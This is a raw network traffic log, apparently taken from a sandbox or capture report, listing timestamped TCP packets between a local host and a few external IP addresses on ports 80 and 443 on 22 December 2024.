Dec 22, 2024 02:16:53.965065002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965148926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965167046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965193033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965204954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965404987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965442896 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965807915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965847969 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965912104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965928078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.965951920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965964079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.966212034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.966248989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.966589928 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.966639042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.966757059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.966797113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.967118025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.967159033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.967226028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.967267036 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.982604980 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:53.983078957 CET	49890	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:53.991873026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.991914034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992048979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992064953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992096901 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992110014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992252111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992296934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992433071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992449045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992465019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.992474079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992486954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.992505074 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.029375076 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:54.029445887 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:54.041719913 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.041775942 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.059115887 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.059132099 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.059386969 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.060658932 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.061585903 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.061619997 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.061685085 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.061716080 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.061856031 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.061887980 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.061975956 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.061997890 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.062091112 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062124014 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.062237024 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062262058 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.062273979 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062287092 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.062369108 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062391043 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.062405109 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062501907 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.062526941 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.101712942 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:54.101763964 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:54.102085114 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:54.102142096 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:54.102448940 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:54.102719069 CET	80	49877	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:54.102766991 CET	80	49890	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:54.102770090 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:54.102844000 CET	49890	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:54.103455067 CET	49890	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:54.107322931 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.107445955 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.107464075 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.107482910 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.107501984 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.107518911 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:54.107531071 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:54.140244007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140295029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.140346050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140362978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140389919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.140408039 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.140613079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140654087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.140794039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140810013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.140836000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141048908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141083956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141083956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141232014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141248941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141273022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141284943 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141494036 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141544104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141675949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141693115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.141720057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141731977 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.141973972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142019987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.142364025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142425060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142433882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.142462015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.142601967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142636061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142644882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.142654896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.142673016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.142685890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143187046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143233061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143297911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143321991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143333912 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143352032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143699884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143740892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143831968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143847942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.143870115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.143881083 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.144058943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.144098997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.144423962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.144465923 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.144510031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.144526005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.144546986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.144556999 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.144797087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.144834995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.145170927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.145226002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.145299911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.145315886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.145339012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.145350933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.145576954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.145613909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.145968914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146008968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146074057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146090031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146111012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146128893 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146370888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146418095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146763086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146800041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146884918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146900892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.146922112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.146934032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.147161007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.147198915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.147330999 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:54.147559881 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.147597075 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.147649050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.147666931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.147687912 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.147700071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.147933960 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.147974968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.148320913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.148360014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.148436069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.148452997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.148473978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.148485899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.148730040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.148770094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.149104118 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.149144888 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.149235964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.149251938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.149274111 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.149286032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.149502993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.149542093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.149878025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.149915934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150000095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150016069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150042057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150053024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150309086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150348902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150666952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150707960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150788069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150804043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.150826931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.150839090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.151066065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.151103973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.151458025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.151498079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.151573896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.151590109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.151616096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.151616096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.151851892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.151892900 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.152254105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.152293921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.152386904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.152404070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.152431965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.152460098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.152674913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.152717113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153032064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153073072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153136015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153151989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153176069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153189898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153423071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153460979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153806925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153847933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153945923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153963089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.153983116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.153999090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.154231071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.154273033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.154635906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.154670954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.154714108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.154730082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.154756069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.154778004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.154992104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.155029058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.155400038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.155440092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.155509949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.155527115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.155549049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.155560970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.155775070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.155813932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.156166077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.156203032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.156299114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.156316042 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.156337023 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.156348944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.156572104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.156611919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.156965971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157007933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157073021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157088995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157107115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157119036 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157372952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157409906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157744884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157787085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157866001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157882929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.157908916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.157919884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.158133984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.158176899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.158575058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.158617973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.158715010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.158731937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.158755064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.158766985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.158972979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.159012079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.183788061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.183840990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.183964014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.183979988 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184005022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184016943 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184106112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184144020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184282064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184298992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184324980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184335947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184550047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184590101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.184776068 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.184817076 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.222990036 CET	80	49890	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:54.332500935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332568884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.332715034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332732916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332782030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.332782030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.332818031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332834959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332849979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.332855940 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.332875967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.332899094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.333343983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.333460093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.333476067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.333501101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.333524942 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.333715916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.333924055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334125042 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334172010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334230900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334248066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334274054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334286928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334516048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334558964 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334832907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334875107 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.334916115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.334959984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.335089922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335107088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335136890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.335148096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.335376024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335422039 CET	49872	80	192.168.2.4	31.41.244.11
